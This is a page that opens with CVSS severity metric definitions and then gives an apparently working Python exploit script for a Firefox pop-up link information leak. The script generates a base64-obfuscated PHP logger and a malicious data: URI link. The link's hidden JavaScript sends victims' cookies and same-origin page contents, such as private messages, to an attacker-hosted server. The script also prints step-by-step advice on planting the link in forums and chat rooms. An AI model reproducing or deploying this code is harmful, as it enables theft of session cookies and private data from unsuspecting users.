The attack requires the attacker to physically touch or manipulate the vulnerable system. Physical interaction may be brief (e.g., evil maid attack1) or persistent. An example of such an attack is a cold boot attack in which an attacker gains access to disk encryption keys after physically accessing the target system. Other examples include peripheral attacks via FireWire/USB Direct Memory Access (DMA).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
None
I
There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Mozilla Firefox Pop-up/New_tab Link Based Informatin Leaking Attack Exploit#save as a Python file and run from terminal
import base64
import io
import platform
import os
happyman1=base64.b64decode("ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC4uDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLCwsICAgICAgICAgICAgICAgICAgICAgICAgIE1NIC5NDQogICAgICAgICAgICAgICAgICAgICAgICAgICAsIU1NTU1NTU0hLCAgICAgICAgICAgICAgICAgICAgIE1NIE1NICAsLg0KICAgLiwgLk0gICAgICAgICAgICAgICAgLk1NTU1NTU1NTU1NTU1NTU0uLCAgICAgICAgICAnTU0uICBNTSBNTSAuTScNCiAuIE06IE07ICBNICAgICAgICAgIC5NTU1NTU1NTU1NTU1NTU1NTU1NTU1NLCAgICAgICAgICAnTU0sOk0gTSchTScNCjtNIE1NIE06IC5NICAgICAgICAuTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU0sICAgICAgICAgJ01NJy4uLidNDQogTTtNTTtNIDpNTSAgICAgIC5NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU0uICAgICAgIC5NTU1NTU1NTQ0KICdNO00nTSBNTSAgICAgIE1NTU1NTSAgTU1NTU1NTU1NTU1NTU1NTU0gIE1NTU1NTS4gICAgLCxNLk0uJ01NTScNCiAgTU0nTU1NTSAgICAgIE1NTU1NTSBAQCBNTU1NTU1NTU1NTU1NTU0gQEAgTU1NTU1NTS4nTScnTU1NTTtNTScNCiBNTS4sICxNTSAgICAgTU1NTU1NTU0gIE1NTU1NTU1NTU1NTU1NTU1NICBNTU1NTU1NTU0gICAgICAnLk1NTQ0KICdNTTtNTU1NTU1NTS5NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTS4gICAgICAnTU1NDQogICcnLidNTU0nICAuTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTSAgICAgICBNTU1NDQogICBNTUMgICAgICBNTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTS4gICAgICAnTU1NTQ0KICAuTU0gICAgICA6TU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTScnTU1NICAgICAgIE1NTU1NDQogIE1NTSAgICAgIDpNICAnTU1NTU1NTU1NTU1NTS5NTU1NTS5NTU1NTU1NTU1NJy5NTSAgTU06TS4gICAgJ01NTU1NDQogLk1NTSAgIC4uLjpNOiA6TS4nTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTScuTScnICAgTU06TU1NTU1NTU1NTU1NJw0KQU1NTS4uTU1NTU06TS4gICAgOk0uJ01NTU1NTU1NTU1NTU1NTU1NTU1NJy5NTScgICAgIE1NJycnJycnJycnJycnDQpNTU1NTU1NTU1NTTpNTSAgICAgJ00nLk0nTU1NTU1NTU1NTU1NTU0nLk1DJ00nICAgICAuTU0NCiAnJycnJycnJycnOk1NLiAgICAgICAnTU0hTS4nTS1NLU0tTSdNLidNTScgICAgICAgIE1NTQ0KICAgICAgICAgICAgTU1NLiAgICAgICAgICAgICdNTU1NIU1NTU0nICAgICAgICAgICAgLk1NDQogICAgICAgICAgICAgTU1NLiAgICAgICAgICAgICAnJycgICAnJyAgICAgICAgICAgIC5NTScNCiAgICAgICAgICAgICAgTU1NLiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNTU0nDQogICAgICAgICAgICAgICBNTU1NICAgICAgICAgICAgLC5KLkpKSkouICAgICAgIC5NTU0nDQogICAgICAgICAgICAgICAgTU1NTS4gICAgICAgJ0pKSkpKSkonSkpKTSAgIENNTU1NTQ0KICAgICAgICAgICAgICAgICAgTU1NTU0uICAgICdKSkpKSkpKSidKSkogLk1NTU1NJw0KICAgICAgICAgICAgICAgICAgICBNTU1NTU1NTS4nICAnSkpKSkonSkpNTU1NTScNCiAgICAgICAgICAgICAgICAgICAgICAnTU1NTU1NTU1NJ0pKSkpKIEpKSkpKJw0KICAgICAgICAgICAgICAgICAgICAgICAgICcnTU1NTU1NSkpKSkpKSkpKSicNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdKSkpKSkpKSic=")
happyman2=base64.b64decode("ICAgICAgICAgICAgICAgICAgICAgKioqICAgICAgICAgICAgICAgICAgKioqDQogICAgICAgICAgICAgICAgICAgICoqKioqICAgICAgICAgICAgICAgICoqKioqDQogICAgICAgICAgICAgICAgICAgICoqKioqICAgICAgICAgICAgICAgICoqKioqDQogICAgICAgICAgICAgICAgICAgICAqKiogICAgICAgICAgICAgICAgICAqKioNCiAgICAgICAgICAqKiogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKioqDQogICAgICAgICAgICoqKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKioqDQogICAgICAgICAgICAqKiogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqKioNCiAgICAgICAgICAgICAqKiogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKioqDQogICAgICAgICAgICAgICAqKiogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqKioNCiAgICAgICAgICAgICAgICAgKioqICAgICAgICAgICAgICAgICAgICAgICAgICAqKioNCiAgICAgICAgICAgICAgICAgICAqKiogICAgICAgICAgICAgICAgICAgICAgKioqDQogICAgICAgICAgICAgICAgICAgICAgKioqKioqKioqKioqKioqKioqKioqKg0KICAgICAgICAgICAgICAgICAgICAgICAgICoqKioqKioqKioqKioqKio=")
sadman=base64.b64decode("ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAuDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBgLg0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLi4uDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYC4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAuLg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYC4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBgLiAgICAgICAgYC4NCiAgICAgICAgICAgICAgICAgICAgICAgICBfX19gLlwuLy8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICBgLS0tLi0tLQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgLyAgICAgXC4tLQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAvICAgICAgIFwtDQogICAgICAgICAgICAgICAgICAgICAgICAgfCAgIC9cICAgIFwNCiAgICAgICAgICAgICAgICAgICAgICAgICB8XD09L1w9PS8gIHwNCiAgICAgICAgICAgICAgICAgICAgICAgICB8IGBAJ2BAJyAgLi0tLg0KICAgICAgICAgICAgICAgICAgLi0tLS0tLS0tLiAgICAgICAgICAgKQ0KICAgICAgICAgICAgICAgIC4nICAgICAgICAgICAgIC4gICBgLl8vDQogICAgICAgICAgICAgICAvICAgICAgICAgICAgICAgfCAgICAgXA0KICAgICAgICAgICAgICAuICAgICAgICAgICAgICAgLyAgICAgICB8DQogICAgICAgICAgICAgIHwgICAgICAgICAgICAgIC8gICAgICAgIHwNCiAgICAgICAgICAgICAgfCAgICAgICAgICAgIC4nICAgICAgICAgfCAgIC4tLS4NCiAgICAgICAgICAgICAuJ2AuICAgICAgICAuJ18gICAgICAgICAgfCAgLyAgICBcDQogICAgICAgICAgIC4nICAgIGAuX18uLS0nLi0tYC4gICAgICAgLyAuJyAgICAgIHwNCiAgICAgICAgIC4nICAgICAgICAgICAgLnwgICAgXFwgICAgIHxfLyAgICAgICAgfA0KICAgICAgIC4nICAgICAgICAgICAgLicgfCAgICAgXFwgICAgICAgICAgICAgICB8DQogICAgIC4tYC4gICAgICAgICAgIC8gICB8ICAgICAgLiAgICAgIF9fICAgICAgIHwNCiAgIC4nICAgIGAuICAgICBcICAgfCAgIGAgICAgICAgICAgIC4nICApICAgICAgXA0KICAvICAgICAgICBcICAgLyBcICB8ICAgICAgICAgICAgLi0nICAgLyAgICAgICB8DQogKCAgLyAgICAgICBcIC8gICBcIHwgICAgICAgICAgICAgICAgIHwgICAgICAgIHwNCiAgXC8gICAgICAgICAoICAgICBcLyAgICAgICAgICAgICAgICAgfCAgICAgICAgfA0KICAoICAvICAgICAgICApICAgIC8gICAgICAgICAgICAgICAgIC8gICBfLi0tLS18DQogICBcLyAgIC8vICAgLyAgIC4nICAgICAgICAgICAgICAgICAgfC4tJyAgICAgICBgDQogICAoICAgLyggICAvICAgLyAgICAgICAgICAgICAgICAgICAgLyAgICAgIGAuICAgfA0KICAgIGAuKCAgYC0nKSAgLi0tLS4gICAgICAgICAgICAgICAgfCAgICBgLiAgIGAuXy8NCiAgICAgICBgLl8uJyAgLyAgICAgYC4gICAuLS0tLiAgICAgIHwgIC4gICBgLl8uJw0KICAgICAgICAgICAgICB8ICAgICAgIFwgLyAgICAgYC4gICAgIFwgIGAuX19fLicNCiAgICAgICAgICAgICAgfCAgICAgICAgWSAgICAgICAgYC4gICAgYC5fX18uJw0KICAgICAgICAgICAgICB8ICAgICAgLiB8ICAgICAgICAgIFwgICAgICAgICBcDQogICAgICAgICAgICAgIHwgICAgICAgYHwgICAgICAgICAgIFwgICAgICAgICB8DQogICAgICAgICAgICAgIHwgICAgICAgIHwgICAgICAgLiAgICBcICAgICAgICB8DQogICAgICAgICAgICAgIHwgICAgICAgIHwgICAgICAgIFwgICAgXCAgICAgICB8DQogICAgICAgICAgICAuLS0uICAgICAgIHwgICAgICAgICBcICAgICAgICAgICB8DQogICAgICAgICAgIC8gICAgYC4gIC4tLS0tLiAgICAgICAgXCAgICAgICAgICAvDQogICAgICAgICAgLyAgICAgICBcLyAgICAgIFwgICAgICAgIFwgICAgICAgIC8NCiAgICAgICAgICB8ICAgICAgIHwgICAgICAgIFwgICAgICAgfCAgICAgICAvDQogICAgICAgICAgIFwgICAgICB8ICAgIEAgICAgXCAgIGAtLiBcICAgICAvDQogICAgICAgICAgICBcICAgICAgXCAgICAgICAgIFwgICAgIFx8Ll9fLicNCiAgICAgICAgICAgICBcICAgICAgXCAgICAgICAgIFwgICAgIHwNCiAgICAgICAgICAgICAgXCAgICAgIFwgICAgICAgICBcICAgIHwNCiAgICAgICAgICAgICAgIFwgICAgICBcICAgICAgICAgXCAgIHwNCiAgICAgICAgICAgICAgICBcICAgIC4nYC4gICAgICAgIFwgIHwNCiAgICAgICAgICAgICAgICAgYC4tJyAgICBgLiAgICBfLidcIHwNCiAgICAgICAgICAgICAgICAgICB8ICAgICAgIGAuLScgICAgfHwNCiAgICAgICAgICAgICAgLiAgICAgXCAgICAgLiBgLiAgICAgfHwgICAgICAuJw0KICAgICAgICAgICAgICAgYC4gICAgYC0uLScgICAgYC5fXy4nICAgICAuJw0KICAgICAgICAgICAgICAgICBgLiAgICAgICAgICAgICAgICAgICAgLicNCiAgICAgICAgICAgICAuICAgICAgICAgICAgICAgICAgICAgICAuJw0KICAgICAgICAgICAgICBgLg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC4tJw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC4tJw0KDQogICAgICBcICAgICAgICAgICAgICAgICBcDQogICAgICAgXCAgICAgICAgIC4uICAgICAgXA0KICAgICAgICBcICAgICAgIC8gIGAtLi0tLl9fXyBfXy4tLl9fXw0KYC0uICAgICAgXCAgICAgLyAgIyAgIGAtLl8uLScgICAgXCAgIGAtLS5fXw0KICAgYC0uICAgICAgICAvICAjIyMjICAgIC8gICAjIyMgIFwgICAgICAgIGAuDQpfX19fX19fXyAgICAgLyAgIyMjIyAjIyMjIyMjIyMjIyMgIHwgICAgICAgX3wgICAgICAgICAgIC4nDQogICAgICAgICAgICB8XCAjIyMjICMjIyMjIyMjIyMjIyMjICBcX18uLS0nIHwgICAgLyAgICAuJw0KICAgICAgICAgICAgfCAjIyMjIyMjIyMjIyMjIyMjIyMjIyAgfCAgICAgICB8ICAgLyAgIC4nDQogICAgICAgICAgICB8ICMjIyMgIyMjIyMjIyMjIyMjIyMjICB8ICAgICAgIHwgIC8NCiAgICAgICAgICAgIHwgIyMjIyAjIyMjIyMjIyMjIyMjIyMgIHwgICAgICAvfCAgICAgIC0tLS0NCiAgICAgICAgICAuIHwgIyMjIyAjIyMjIyMjIyMjIyMjIyMgIHwgICAgLic8ICAgIF9fX18NCiAgICAgICAgLicgIHwgIyMjIyMjIyMjIyMjIyMjIyMjIyMgIHwgXy4nLSdcfA0KICAgICAgLicgICAgfCAgICMjIyMjIyMjIyMjIyMjIyMjIyAgfCAgICAgICB8DQogICAgICAgICAgICAgYC4gICAjIyMjIyMjIyMjIyMjIyMjICB8ICAgICAgIHwNCiAgICAgICAgICAgICAgIGAuICAgICMjIyMjIyMjIyMjIyAgIHwgICAgICAgfCAtLS0tDQogICAgICAgICAgICAgIF9fX2AuICAgICAjIyMjIyAgICAgXy4uX19fXy4tJyAgICAgLg0KICAgICAgICAgICAgIHxgLS5fIGAtLl8gICAgICAgXy4tJyAgICBcXFwgICAgICAgICBgLg0KICAgICAgICAgIC4nYC0uXyAgYC0uXyBgLS5fLi0nYC0tLl9fXy4tJyBcICAgICAgICAgIGAuDQogICAgICAgIC4nIC4uIC4gYC0uXyAgYC0uXyAgICAgICAgX19fLi0tLSd8ICAgXCAgIFwNCiAgICAgIC4nIC4uIC4gLi4gLiAgYC0uXyAgYC0uX18uLScgICAgICAgIHwgICAgXCAgIFwNCiAgICAgfGAtLiAuIC4uICAuIC4uIC4gIGAtLl98ICAgICAgICAgICAgIHwgICAgIFwgICBcDQogICAgIHwgICBgLS5fIC4gLi4gIC4gLi4gICAuJyAgICAgICAgICAgIF98DQogICAgICBgLS5fICAgYC0uXyAuIC4uICAgLicgfCAgICAgIF9fLi0tJw0KICAgICAgICAgIGAtLl8gICBgLS5fICAuJyAuJ3xfXy4tLScNCiAgICAgICAgICAgICAgYC0uXyAgIGAnIC4nDQogICAgICAgICAgICAgICAgICBgLS5fLic=")
base64Exploit ="""PD9waHANCiRkYXRhPXN0cl9yZXBsYWNlKCIgIiwiKyIsJF9QT1NUWydkYXRhJ10pOw0KJGNvb2tpZXM9JF9QT1NUWydjb29raWVzJ107DQokaW5mbz0nPGh0bWw+PGJvZHk+PGZvbnQgY29sb3I9ImJsdWUiIHNpemU9IjUiPkxlYWtlZCBJbmZvcm1hdGlvbnM8L2ZvbnQ+PGJyPjxmb250IGNvbG9yPSJncmVlbiIgc2l6ZT0iMyI+VmljdGltIElQOicuJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10uIjxicj48YnI+VmljdGltIFVTRVIgQUdFTlQ6Ii4kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10uIjxicj48YnI+Q29va2llczo8YnI+Ii4kY29va2llcy4iPC9mb250Pjxocj4iOw0KJGRhdGE9IjxodG1sPjxib2R5IG9ubG9hZD0iLiInIi4nDQp2YXIgQmFzZTY0PXtfa2V5U3RyOiJBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvPSIsZW5jb2RlOmZ1bmN0aW9uKGUpe3ZhciB0PSIiO3ZhciBuLHIsaSxzLG8sdSxhO3ZhciBmPTA7ZT1CYXNlNjQuX3V0ZjhfZW5jb2RlKGUpO3doaWxlKGY8ZS5sZW5ndGgpe249ZS5jaGFyQ29kZUF0KGYrKyk7cj1lLmNoYXJDb2RlQXQoZisrKTtpPWUuY2hhckNvZGVBdChmKyspO3M9bj4+MjtvPShuJjMpPDw0fHI+PjQ7dT0ociYxNSk8PDJ8aT4+NjthPWkmNjM7aWYoaXNOYU4ocikpe3U9YT02NH1lbHNlIGlmKGlzTmFOKGkpKXthPTY0fXQ9dCt0aGlzLl9rZXlTdHIuY2hhckF0KHMpK3RoaXMuX2tleVN0ci5jaGFyQXQobykrdGhpcy5fa2V5U3RyLmNoYXJBdCh1KSt0aGlzLl9rZXlTdHIuY2hhckF0KGEpfXJldHVybiB0fSxkZWNvZGU6ZnVuY3Rpb24oZSl7dmFyIHQ9IiI7dmFyIG4scixpO3ZhciBzLG8sdSxhO3ZhciBmPTA7ZT1lLnJlcGxhY2UoL1teQS1aYS16MC05Ky89XS9nLCIiKTt3aGlsZShmPGUubGVuZ3RoKXtzPXRoaXMuX2tleVN0ci5pbmRleE9mKGUuY2hhckF0KGYrKykpO289dGhpcy5fa2V5U3RyLmluZGV4T2YoZS5jaGFyQXQoZisrKSk7dT10aGlzLl9rZXlTdHIuaW5kZXhPZihlLmNoYXJBdChmKyspKTthPXRoaXMuX2tleVN0ci5pbmRleE9mKGUuY2hhckF0KGYrKykpO249czw8MnxvPj40O3I9KG8mMTUpPDw0fHU+PjI7aT0odSYzKTw8NnxhO3Q9dCtTdHJpbmcuZnJvbUNoYXJDb2RlKG4pO2lmKHUhPTY0KXt0PXQrU3RyaW5nLmZyb21DaGFyQ29kZShyKX1pZihhIT02NCl7dD10K1N0cmluZy5mcm9tQ2hhckNvZGUoaSl9fXQ9QmFzZTY0Ll91dGY4X2RlY29kZSh0KTtyZXR1cm4gdH0sX3V0ZjhfZW5jb2RlOmZ1bmN0aW9uKGUpe2U9ZS5yZXBsYWNlKC9ybi9nLCJuIik7dmFyIHQ9IiI7Zm9yKHZhciBuPTA7bjxlLmxlbmd0aDtuKyspe3ZhciByPWUuY2hhckNvZGVBdChuKTtpZihyPDEyOCl7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyKX1lbHNlIGlmKHI+MTI3JiZyPDIwNDgpe3QrPVN0cmluZy5mcm9tQ2hhckNvZGUocj4+NnwxOTIpO3QrPVN0cmluZy5mcm9tQ2hhckNvZGUociY2M3wxMjgpfWVsc2V7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyPj4xMnwyMjQpO3QrPVN0cmluZy5mcm9tQ2hhckNvZGUocj4+NiY2M3wxMjgpO3QrPVN0cmluZy5mcm9tQ2hhckNvZGUociY2M3wxMjgpfX1yZXR1cm4gdH0sX3V0ZjhfZGVjb2RlOmZ1bmN0aW9uKGUpe3ZhciB0PSIiO3ZhciBuPTA7dmFyIHI9YzE9YzI9MDt3aGlsZShuPGUubGVuZ3RoKXtyPWUuY2hhckNvZGVBdChuKTtpZihyPDEyOCl7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyKTtuKyt9ZWxzZSBpZihyPjE5MSYmcjwyMjQpe2MyPWUuY2hhckNvZGVBdChuKzEpO3QrPVN0cmluZy5mcm9tQ2hhckNvZGUoKHImMzEpPDw2fGMyJjYzKTtuKz0yfWVsc2V7YzI9ZS5jaGFyQ29kZUF0KG4rMSk7YzM9ZS5jaGFyQ29kZUF0KG4rMik7dCs9U3RyaW5nLmZyb21DaGFyQ29kZSgociYxNSk8PDEyfChjMiY2Myk8PDZ8YzMmNjMpO24rPTN9fXJldHVybiB0fX0NCmRvY3VtZW50LmJvZHkuaW5uZXJIVE1MPWF0b2IoIicuYmFzZTY0X2VuY29kZSgkaW5mbykuJyIpOw0KZG9jdW1lbnQuYm9keS5pbm5lckhUTUwrPUJhc2U2NC5kZWNvZGUoIicuJGRhdGEuJyIpOycuIic+Ii4NCic8L2JvZHk+PC9odG1sPic7DQpmdW5jdGlvbiBnZW5lcmF0ZVJhbmRvbVN0cmluZygpIHsNCiAgICAkY2hhcmFjdGVycyA9ICcwMTIzNDU2Nzg5YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXonOw0KICAgICRjaGFyYWN0ZXJzTGVuZ3RoID0gc3RybGVuKCRjaGFyYWN0ZXJzKTsNCiAgICAkcmFuZG9tU3RyaW5nID0gJyc7DQogICAgZm9yICgkaSA9IDA7ICRpIDwgNTsgJGkrKykgew0KICAgICAgICAkcmFuZG9tU3RyaW5nIC49ICRjaGFyYWN0ZXJzW3JhbmQoMCwgJGNoYXJhY3RlcnNMZW5ndGggLSAxKV07DQogICAgfQ0KICAgIHJldHVybiAkcmFuZG9tU3RyaW5nOw0KfQ0KZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10uIl8iLmdlbmVyYXRlUmFuZG9tU3RyaW5nKCkuIi5odG1sIiwgJGRhdGEgLCBGSUxFX0FQUEVORCB8IExPQ0tfRVgpOw0KPz4="""
def ColourMe(txt,colour):
opsys = platform.system()
if (opsys=="Linux"):
from termcolor import colored
return colored(txt,colour)
else:
return txt
def PrepareLink(i1,i2,i3,i4):
stealer=base64.b64decode("ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIm1uaCIpLnJlbW92ZSgpO3ZhciBCYXNlNjQ9e19rZXlTdHI6IkFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky89IixlbmNvZGU6ZnVuY3Rpb24oZSl7dmFyIHQ9IiI7dmFyIG4scixpLHMsbyx1LGE7dmFyIGY9MDtlPUJhc2U2NC5fdXRmOF9lbmNvZGUoZSk7d2hpbGUoZjxlLmxlbmd0aCl7bj1lLmNoYXJDb2RlQXQoZisrKTtyPWUuY2hhckNvZGVBdChmKyspO2k9ZS5jaGFyQ29kZUF0KGYrKyk7cz1uPj4yO289KG4mMyk8PDR8cj4+NDt1PShyJjE1KTw8MnxpPj42O2E9aSY2MztpZihpc05hTihyKSl7dT1hPTY0fWVsc2UgaWYoaXNOYU4oaSkpe2E9NjR9dD10K3RoaXMuX2tleVN0ci5jaGFyQXQocykrdGhpcy5fa2V5U3RyLmNoYXJBdChvKSt0aGlzLl9rZXlTdHIuY2hhckF0KHUpK3RoaXMuX2tleVN0ci5jaGFyQXQoYSl9cmV0dXJuIHR9LGRlY29kZTpmdW5jdGlvbihlKXt2YXIgdD0iIjt2YXIgbixyLGk7dmFyIHMsbyx1LGE7dmFyIGY9MDtlPWUucmVwbGFjZSgvW15BLVphLXowLTkrLz1dL2csIiIpO3doaWxlKGY8ZS5sZW5ndGgpe3M9dGhpcy5fa2V5U3RyLmluZGV4T2YoZS5jaGFyQXQoZisrKSk7bz10aGlzLl9rZXlTdHIuaW5kZXhPZihlLmNoYXJBdChmKyspKTt1PXRoaXMuX2tleVN0ci5pbmRleE9mKGUuY2hhckF0KGYrKykpO2E9dGhpcy5fa2V5U3RyLmluZGV4T2YoZS5jaGFyQXQoZisrKSk7bj1zPDwyfG8+PjQ7cj0obyYxNSk8PDR8dT4+MjtpPSh1JjMpPDw2fGE7dD10K1N0cmluZy5mcm9tQ2hhckNvZGUobik7aWYodSE9NjQpe3Q9dCtTdHJpbmcuZnJvbUNoYXJDb2RlKHIpfWlmKGEhPTY0KXt0PXQrU3RyaW5nLmZyb21DaGFyQ29kZShpKX19dD1CYXNlNjQuX3V0ZjhfZGVjb2RlKHQpO3JldHVybiB0fSxfdXRmOF9lbmNvZGU6ZnVuY3Rpb24oZSl7ZT1lLnJlcGxhY2UoL3JuL2csIm4iKTt2YXIgdD0iIjtmb3IodmFyIG49MDtuPGUubGVuZ3RoO24rKyl7dmFyIHI9ZS5jaGFyQ29kZUF0KG4pO2lmKHI8MTI4KXt0Kz1TdHJpbmcuZnJvbUNoYXJDb2RlKHIpfWVsc2UgaWYocj4xMjcmJnI8MjA0OCl7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyPj42fDE5Mik7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyJjYzfDEyOCl9ZWxzZXt0Kz1TdHJpbmcuZnJvbUNoYXJDb2RlKHI+PjEyfDIyNCk7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyPj42JjYzfDEyOCk7dCs9U3RyaW5nLmZyb21DaGFyQ29kZShyJjYzfDEyOCl9fXJldHVybiB0fSxfdXRmOF9kZWNvZGU6ZnVuY3Rpb24oZSl7dmFyIHQ9IiI7dmFyIG49MDt2YXIgcj1jMT1jMj0wO3doaWxlKG48ZS5sZW5ndGgpe3I9ZS5jaGFyQ29kZUF0KG4pO2lmKHI8MTI4KXt0Kz1TdHJpbmcuZnJvbUNoYXJDb2RlKHIpO24rK31lbHNlIGlmKHI+MTkxJiZyPDIyNCl7YzI9ZS5jaGFyQ29kZUF0KG4rMSk7dCs9U3RyaW5nLmZyb21DaGFyQ29kZSgociYzMSk8PDZ8YzImNjMpO24rPTJ9ZWxzZXtjMj1lLmNoYXJDb2RlQXQobisxKTtjMz1lLmNoYXJDb2RlQXQobisyKTt0Kz1TdHJpbmcuZnJvbUNoYXJDb2RlKChyJjE1KTw8MTJ8KGMyJjYzKTw8NnxjMyY2Myk7bis9M319cmV0dXJuIHR9fQ0KdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOw0KeGhyLm9ucmVhZHlzdGF0ZWNoYW5nZSA9IGZ1bmN0aW9uKCkgew0KICAgIGlmICh4aHIucmVhZHlTdGF0ZSA9PSBYTUxIdHRwUmVxdWVzdC5ET05FKSB7DQp2YXIgeGhyMiA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOw0KeGhyMi5vcGVuKCJQT1NUIiwgIg==")+i1+base64.b64decode("IiwgdHJ1ZSk7DQp4aHIyLnNldFJlcXVlc3RIZWFkZXIoIkNvbnRlbnQtVHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKTsNCnhocjIuc2VuZCgiZGF0YT0iK0Jhc2U2NC5lbmNvZGUoeGhyLnJlc3BvbnNlVGV4dCkrICImY29va2llcz0iK2RvY3VtZW50LmNvb2tpZSk7DQogICAgfQ0KfQ0KeGhyLm9wZW4oIkdFVCIsICI=")+i2+base64.b64decode("IiwgdHJ1ZSk7DQp4aHIuc2VuZChudWxsKTs=")
BadIMGTag="<img id='mnh' src='d:s' style='display: none;' onerror='"+stealer+"'>"
HTMLCode="<html><body onload='window.opener.document.body.innerHTML+=atob("+'"'+base64.b64encode(BadIMGTag)+'"'+");document.location=atob("+'"'+base64.b64encode(i4)+'"'+");'>"+'</body></html>'
print ColourMe("\n\n"+happyman1+"\n\n","green")
print ColourMe('The malicious link is here:',"cyan")
print '============================\n<a target="_blank" href="data:text/html;base64,'+base64.b64encode(HTMLCode)+'">'+i3+'</a>\n============================'
print '\nInject this link to the page of forums,Websites,Chat-rooms,... that allows you to insert Pop-up/new_tab link tags.If a firefox user clicks on it,his cookies and sensitive informations will be saved on your web host(in the folder that you uploaded logger.php).Note:All Firefox-based browsers are vulnerable.This Exploit does not affect IE,Chrome.Other browsers such as Opera,Safari,...may be vulnerable.I don'+"'"+'t know.You should test it!\n\n\n'+'Injection methods:\n\n1-HTML Link tag injection:\nIf you can insert a link tag you should paste the copied link element to a page and submit it\n\n2-Injection by Link adder tools:\nSome forums,chat-rooms,... don'+"'t "+'allow you to insert html link tags.So you should create a link with the fallowing properties and submit it:\nLabel:'+i3+'\nAddress or href:data:text/html;base64,'+base64.b64encode(HTMLCode)+'\ntarget(must be pop up or new tab link):_blank'+'\n\nEnjoy and be a professional exploiter!Bye.\n'+base64.b64decode("KCAgX19fIFwgfFwgICAgIC98KCAgX19fXyBcKCApDQp8ICggICApICkoIFwgICAvICl8ICggICAgXC98IHwNCnwgKF9fLyAvICBcIChfKSAvIHwgKF9fICAgIHwgfA0KfCAgX18gKCAgICBcICAgLyAgfCAgX18pICAgfCB8DQp8ICggIFwgXCAgICApICggICB8ICggICAgICAoXykNCnwgKV9fXykgKSAgIHwgfCAgIHwgKF9fX18vXCBfIA0KfC8gXF9fXy8gICAgXF8vICAgKF9fX19fX18vKF8pDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA=")
def Exploit():
with io.FileIO(os.path.dirname(os.path.realpath(__file__))+"/logger.php", "w") as file:
file.write(base64.b64decode(base64Exploit))
logger_link = raw_input("\nlogger.php file was created by this python script in the current folder.\nUpload it to your Web Server,Insert the HTTP address(URL) of file after uploading(for example:http://badhacker.com/folder/to/file/logger.php):")
stolen_page = raw_input("\nInsert the URL of the page you want to steal it.You can steal private messages,personal informations,settings,...( this and the link container page MUST have the same origion)(for example:http://victimforum.com/privatemessages.php?page=1):")
title = raw_input("\nInsert some text for label of the malicious link(for example:Click Me!):")
fake_url = raw_input("\nInsert the URL of the page that victim will visit by your malicious link(for example:https://google.com):")
print "\nHere is what you want:\nlogger.php file URL:"+logger_link+"\nPage you want to steal:"+stolen_page+"\nTitle of the malicious link:"+title+"\nFake URL of the malicious link:"+fake_url+"\n\n\n\n\n"
